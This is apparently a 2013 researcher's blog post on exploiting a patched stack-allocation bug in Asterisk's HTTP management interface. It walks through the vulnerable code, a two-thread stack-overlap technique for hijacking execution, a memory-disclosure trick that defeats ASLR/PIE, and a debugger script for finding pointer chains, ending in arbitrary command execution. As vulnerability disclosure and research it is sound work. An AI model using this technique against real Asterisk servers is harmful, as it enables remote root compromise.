DoS? Then Who Was Phone?

Introduction

This post presents exploitation notes on a vulnerability we discovered in Asterisk, an open source telephony solution produced by Digium. We reported this bug to Digium on November 27th, 2012, and provided it to customers of the Exodus Intelligence Feed as EIP-2012-0008. Digium released the advisory AST-2012-014 for this vulnerability on January 2nd, 2013, which was picked up shortly after by some of the aggregator sites and incorrectly categorized as a denial-of-service; however, this bug is certainly exploitable. As we found it fun to analyze, and since discussions about server-side memory bugs are a little sparse now-a-days, we thought it would be cool to share for others who might also find it interesting.

Vulnerability

The vulnerability resides in the HTTP Asterisk Management Interface (AMI) service, and is the result of an

alloca

being used to “allocate” memory with a remotely-supplied, untrusted size value. The vulnerability is present in the Asterisk source code file

main/http.c

, specifically in the function

ast_http_get_post_vars

, which as the name would suggest is used to parse HTTP POST variable data. A snip of the pertinent vulnerable code in this function is shown below:

struct ast_variable *ast_http_get_post_vars(
  struct ast_tcptls_session_instance *ser, struct ast_variable *headers)
{
  int content_length = 0;
  struct ast_variable *v, *post_vars=NULL, *prev = NULL;
  char *buf, *var, *val;

  for (v = headers; v; v = v->next) {
    if (!strcasecmp(v->name, "Content-Type")) {
      if (strcasecmp(v->value, "application/x-www-form-urlencoded")) {
        return NULL;
      }
      break;
    }
  }

  for (v = headers; v; v = v->next) {
    if (!strcasecmp(v->name, "Content-Length")) {
      content_length = atoi(v->value) + 1;
      break;
    }
  }

  if (!content_length) {
    return NULL;
  }

  if (!(buf = alloca(content_length))) {
    return NULL;
  }
  if (!fgets(buf, content_length, ser->f)) {
    return NULL;
  }

The code shows the length value being converted from the Content-Length string using

atoi

, then incremented by one and stored in the

content_length

variable. Memory is obtained by

alloca

for the expected content length, and pointed to by

*buf

. Finally,

fgets

is called to read the expected amount of content data into this buffer. I found it interesting that the code looks as though it may have been written with memory management issues in mind, as the check to ensure

content_length

is not zero would catch an integer overflow caused by adding one to the value.

Below is a snip of disassembled code for the vulnerable function as compiled in the Asterisk package shipped with Ubuntu. This snip shows the size value being set and used to subtract the stack pointer (

ESP

) to “allocate” stack memory:

<ast_http_get_post_vars+187>:   call   <strtol@plt>
<ast_http_get_post_vars+192>:   mov    edx,eax
<ast_http_get_post_vars+194>:   add    edx,0x1
<ast_http_get_post_vars+197>:   je     <ast_http_get_post_vars+408>
<ast_http_get_post_vars+203>:   mov    ecx,DWORD PTR [ebp-0x30]
<ast_http_get_post_vars+206>:   add    eax,0x1f
<ast_http_get_post_vars+209>:   and    eax,0xfffffff0
<ast_http_get_post_vars+212>:   sub    esp,eax <----- LOL
<ast_http_get_post_vars+214>:   lea    esi,[esp+0x1b]

As shown, the

alloca

is compiled into a simple set of instructions to ADD and AND-off the size to be allocated from the stack. It then subtracts the revised size from the stack pointer, and stores an address derived from this into the

ESI

register for further use.

Exploitation Obstacles

Since most compilers implement

alloca

as a fairly direct subtraction of the stack pointer, the exploitation of

alloca

is often as simple as providing a size value large enough to wrap the stack pointer around to a desirable location higher on the stack. Subsequent use of the pointer to store remotely supplied data would then result in stack memory corruption, and allow for vanilla exploitation techniques to gain control of program execution flow.

However, here the vulnerable code uses the function

fgets

to read network data into the obtained memory space. This complicates the situation for exploitation as the libc implementation of

fgets

performs a check on its length argument to ensure that it is not beyond the signed integer boundary of

0x7FFFFFFF

. If this check fails,

fgets

does not read data and returns an error. The code snip below shows the check performed inside of

fgets

as implemented in libc.6.so:

<fgets+0>:     sub    esp,0x4c
<fgets+3>:     mov    DWORD PTR [esp+0x48],ebp
<fgets+7>:     mov    ebp,DWORD PTR [esp+0x54]
<fgets+11>:    mov    DWORD PTR [esp+0x3c],ebx
<fgets+15>:    call   <mov_esp_ebx>
<fgets+20>:    add    ebx,0x14051c
<fgets+26>:    mov    DWORD PTR [esp+0x40],esi
<fgets+30>:    mov    esi,DWORD PTR [esp+0x58]
<fgets+34>:    test   ebp,ebp
<fgets+36>:    mov    DWORD PTR [esp+0x44],edi
<fgets+36>:    mov    DWORD PTR [esp+0x44],edi
<fgets+40>:    jle    <fgets+336>
...
<fgets+336>:   mov    DWORD PTR [esp+0x50],0x0
<fgets+344>:   jmp    <fgets+256>
...
<fgets+256>:   mov    eax,DWORD PTR [esp+0x50]
<fgets+260>:   mov    ebx,DWORD PTR [esp+0x3c]
<fgets+264>:   mov    esi,DWORD PTR [esp+0x40]
<fgets+268>:   mov    edi,DWORD PTR [esp+0x44]
<fgets+272>:   mov    ebp,DWORD PTR [esp+0x48]
<fgets+276>:   add    esp,0x4c
<fgets+279>:   ret    

The

EBP

register, containing the length argument, is checked to be a positive signed value using the

TEST

and

JLE

instructions at

&lt;fgets+34&gt;

and

&lt;fgets+40&gt;

. If the check fails, the code jumps to return an error, making

fgets

unusable for exploiting a wrapped stack pointer to overwrite memory with data read from the network. While stack corruption by this means is still possible through the pushing and moving of data to the stack by other compiled code operations, the lack of control and limited set of operations make this approach undesirable.

At this point some might categorize this vulnerability as purely theoretical or possibly even unexploitable. As I hope many readers would agree, a challenge of this nature is always inviting. The Exodus team loves goading and trolling one another in these scenarios, usually with something along the lines of “Yeah, it is probably too tough for you to exploit…” or “you should probably just give up.” The recipient of this pep talk usually proceeds to cry and reevaluate the code until an idea hits them or they decide to resign to a life of PCI compliance auditing. Challenge accepted.

EIP Control

After spending some time analyzing the problem and hating computers, I found a way to exploit this vulnerability. The HTTP listener for the Asterisk Management Interface handles every new connection by creating a new thread to execute a designated worker function to process the request. The code to setup and complete this task is spread out across multiple functions and macros and is a little messy, so we’ll try to keep details to a minimum. The HTTP AMI is started initially by a call chain of functions starting with

ast_http_init

, which calls

__ast_http_load

, which then calls

ast_tcptls_server_start

. The function

ast_tcptls_server_start

performs standard TCP socket setup operations, and is defined as:

void ast_tcptls_server_start(struct ast_tcptls_session_args *desc)

Despite the name,

ast_tcptls_server_start

is used for both TLS and non-TLS service setup. The single argument taken by this function is a structure describing aspects of the server to be started. From

__ast_http_load

, the call looks like:

ast_tcptls_server_start(&amp;http_desc);

The structure structure

http_desc

is defined in

main/http.c

as:

static struct ast_tcptls_session_args http_desc = {
  .accept_fd = -1,
  .master = AST_PTHREADT_NULL,
  .tls_cfg = NULL,
  .poll_timeout = -1,
  .name = "http server",
  .accept_fn = ast_tcptls_server_root,
  .worker_fn = httpd_helper_thread,
};

The

.accept_fn

is a function pointer for a function to accept the connection, and the

worker_fn

is a pointer to the worker function responsible for processing the request once a new thread is created. After more setup code, a new thread is created to accept socket connections by calling the function

ast_tcptls_server_root

. For each TCP connection accepted on the listening HTTP port (default 8088),

ast_tcptls_server_root

calls the following thread creation wrapper to create a new thread and eventually call the worker function:

 

...
if (ast_pthread_create_detached_background(&launched, NULL, handle_tcptls_connection, tcptls_session)) {
  ast_log(LOG_WARNING, "Unable to launch helper thread: %sn", strerror(errno));
   ast_tcptls_close_session_file(tcptls_session);
   ao2_ref(tcptls_session, -1);
   }
...

The function

ast_pthread_create_detached_background

is a macro wrapper for the function

ast_pthread_create_stack

. The macro definition looks roughly like:

ast_pthread_create_detached_stack(a, b, c, d, AST_BACKGROUND_STACKSIZE, ...)

The important thing to note here is the argument

AST_BACKGROUND_STACKSIZE

. This is used by the function to set the new thread’s stack size attribute before starting the thread:

pthread_attr_setstacksize(attr, stacksize ? stacksize : AST_STACKSIZE)
...
return pthread_create(thread, attr, start_routine, data);

For builds without low memory restrictions defined, the AST_BACKGROUND_STACKSIZE and the

AST_STACKSIZE

macros are defined as:

#define AST_BACKGROUND_STACKSIZE AST_STACKSIZE
#define AST_STACKSIZE (((sizeof(void *) * 8 * 8) - 16) * 1024) /* becomes 0x3C000 */

The use of

AST_STACKSIZE

, or 0x3C000, to set the size of the stack for each new HTTP thread is significant, as it means the stack of the newly created thread will begin at 0x3C000 below the top of the previous thread’s stack. In turn, if a value of this size or greater is used for

alloca

pointer subtraction, the resulting stack pointer will overlap with the stack memory of a newer thread. By carefully synchronizing the state of the threads involved so they do not collide their shared use of stack memory, it is possible to use this behavior to overwrite the contents of one thread’s stack area with network data read by another thread. To visualize this, and because I love drawing stack diagrams, I present the following bad art:

By offsetting from the higher stack by 0x3C000, the stack pointer will be at the equivalent location in the lower stack

Synchronizing the two threads such that they do not collide and clobber each other’s critical stack contents is as simple as not sending data when a given thread is expecting it. While one thread is waiting for data in a blocking read operation, the other thread may be using the stack. Using the HTTP POST method (as is required to trigger the vulnerability) allows for two separate network read operations per thread: one for the initial read of HTTP headers, and a second for reading the HTTP Content-Data. Having two individual network read operations per thread provides enough blocking opportunity to align the augmented stack pointer of the first thread to a desirable location used by the second thread. Better yet, this provides an opportunity to align the pointer of the first thread to a location that is not yet used by the second thread, but will be used once the second thread completes its initial read and resumes execution. The following diagram steps attempt to illustrate this process, ignoring trivial details and using round numbers for simplicity.

1. Two socket connections to the HTTP AMI service are established, causing Asterisk to create two threads to handle the connections. Both threads are expecting HTTP headers and so they are both blocking on a read operation. To depict the state of these threads:

two threads created, with their stacks offset by 0x3C000

2. Thread1 is sent HTTP headers with an HTTP Content-Length string equivalent to 0x3C900. Once headers are received, Thread1’s initial read operation finishes. It performs the

alloca

, subtracting its stack pointer by 0x3C900, which places its pointer for

*buf

at 0x900 bytes down from the top of Thread2’s stack:

Thread1 stack pointer now overlaps with the stack area allocated for thread2

3. Thread1 is then sent approximately 0x700 bytes of the 0x3C900 it is expecting. This advances the

*buf

pointer index used by

fgets

up the stack, closer to Thread2’s current stack pointer. Thread1 continues waiting as it has not yet received the full amount of data expected (0x3C900).

The location into *buf is advanced by 0x700, moving it up the stack

4. Thread2, still waiting on its initial network read, is sent HTTP POST headers with a Content-Length string equivalent to approximately 0x200, which it uses for its own

alloca

, subtracting from its stack pointer. Coordinating this length carefully places it precisely where the

*buf

pointer in Thread1

fgets

currently points. Thread2 then calls

fgets

to receive its HTTP Content-Data, causing it to block while waiting to read in data.

The stack frame for the call performed by thread2 sites directly next to the current *buf index of thread1

5. Thread1 is sent 4 more bytes of the data it is waiting to receive, which is stored starting at its current

*buf

index in

fgets

, and overwrites where Thread2’s stored return address is for

fgets

. A return from

fgets

can then be triggered by sending the remaining data expected, or a newline character, or also by simply closing the connection. Once Thread2 returns,

EIP

is restored from the overwritten return address value and execution flow is controlled.

Clockwork

Protection Mechanisms

Precisely overwriting only desired stack contents leaves stack canaries intact so that they do not interfere with exploitation. To avoid non-executable memory protections, typical return-oriented techniques may be employed to reuse existing executable memory once execution flow is controlled. This leaves Address Space Layout Randomization (ASLR), and more specifically, Asterisk builds compiled as Position-Independent-Executables (PIE) as the only remaining obstacle to overcome, as fixed return locations cannot be used in this case.

While the default Makefile generated to compile Asterisk from source does not include flags for PIE, popular Linux distributions may package their own Asterisk builds compiled with PIE for extra security, such as with Ubuntu (props to @kees_cook for keeping us on our toes with this). ASLR via PIE significantly frustrates exploitation. Since Ubuntu is a popular distribution, and having set the bar for difficulty in this case, the Ubuntu Asterisk build is the target we challenged ourselves with.

Who Was Phone

I will save you from babble about entropy and efforts made to try and guess addresses in the presence of ASLR. Instead we will discuss how this vulnerability can be reliably exploited for memory disclosure, and used to determine the location of Asterisk code memory to redirect execution to.

The function

generic_http_callback

in

main/manager.c

is the URL handling function executed when triggering the vulnerability, and is defined as:

static int generic_http_callback(struct ast_tcptls_session_instance *ser,
             enum ast_http_method method,
             enum output_format format,
             struct sockaddr_in *remote_address, const char *uri,
             struct ast_variable *get_params,
             struct ast_variable *headers)
{

Above you can see the

output_format

argument

format

is an enumeration value for one of the possible formats used for the reply. Its expected possible values are 0, 1, or 2 for “plain”, “html”, “xml” respectively. This value is used to retrieve a pointer from a global array when constructing a response in

generic_http_callback

:

 

/* ... */
  ast_str_append(&http_header, 0,
    "Content-type: text/%srn"
    "Cache-Control: no-cache;rn"
    "Set-Cookie: mansession_id="%08x"; Version=1; Max-Age=%drn"
    "Pragma: SuppressEventsrn",
    contenttype[format],
    session->managerid, httptimeout);
/* ... */
  ast_http_send(ser, method, 200, NULL, http_header, out, 0, 0);
/* ... */

The

contenttype

array contains the pointers to the strings used for the HTTP response, and thus the pointer retrieved from this look-up directly influences data sent back to the HTTP user. By conducting the same style of stack pointer manipulation previously described, it is possible to align a thread’s

*buf

pointer to overwrite the stack memory where

format

is stored, so it indexes beyond the

contenttype

array into other memory. With the help of some handy debugger scripting, I was able to find a pointer->pointer->code from a relative offset of

contenttype

. My code to do this with VDB is shown below. (Comments document the code a little bit, but a more extensive explanation of VDB is beyond the scope of this post):

for m in trace.getMemoryMaps():

  # check memory map name
  if m[3].lower() == "/usr/sbin/asterisk":

    #  check for flags Read & Write for data segment
    if m[2] == 6:
      addr = m[0]
      memlen = m[1]
      memory = trace.readMemory(addr, memlen)
  
    # check for Execute flag
    elif m[2] == 5:
      # save beginning and ending of executable memory
      code = m[0]
      codestop = code+m[1]

# from each offset in the memory
for offset in range(memlen-4):

  # read for the size of a pointer
  ptr = struct.unpack("<I", memory[offset:offset+4])[0]

  # check if it is a pointer
  if ispoi(ptr):
    # read the value at the pointer
    ptr = struct.unpack("<I", trace.readMemory(ptr, 4))[0]

    # is that value in the asterisk code?
    if ptr > code and ptr < codestop:
      print "[*] Found 0x%08x -> 0x%08x" % (addr+offset, ptr)

The script simply searches the memory maps of the attached process for the Asterisk data and code memory regions. Once they are found, the value at every possible offset in the data map is checked to be a valid memory address. Passing this check, the value at the memory it points to is then also checked to see if it is a pointer to code memory and then prints out valid matches. This script identified 8 locations of usable pointers when ran against Ubuntu’s packaged Asterisk binary.

By overwriting the saved

format

variable with an index to offset to one of these pointer sequences, it is possible to manufacture a remote memory disclosure and determine an address of Asterisk code memory. Putting this all together allows for successful remote arbitrary code execution despite ASLR/PIE/NX/STACK COOKIES/ALL_OF_THE_THINGS compiled in with the Ubuntu build. To add to an already silly amount of convenience with the conditions surrounding this bug, when gaining EIP control through the method described, the next value on the stack above the overwritten return address is a pointer to the buffer passed to

fgets

in the second thread. This buffer is populated with the second thread’s received HTTP Content-Data (remotely-controlled data). Using the memory disclosure to calculate the address of a call to the function

ast_safe_system

, which takes a single string pointer argument to execute as a command line, it is simple to exploit the return in the second thread to execute arbitrary commands from the Asterisk process — which often runs as root. Using this to spawn a remote shell with Ubuntu’s default dash shell is a little obnoxious, but possible, and an exercise left up to the reader.

Hope you enjoyed the post!

Brandon Edwards
@drraid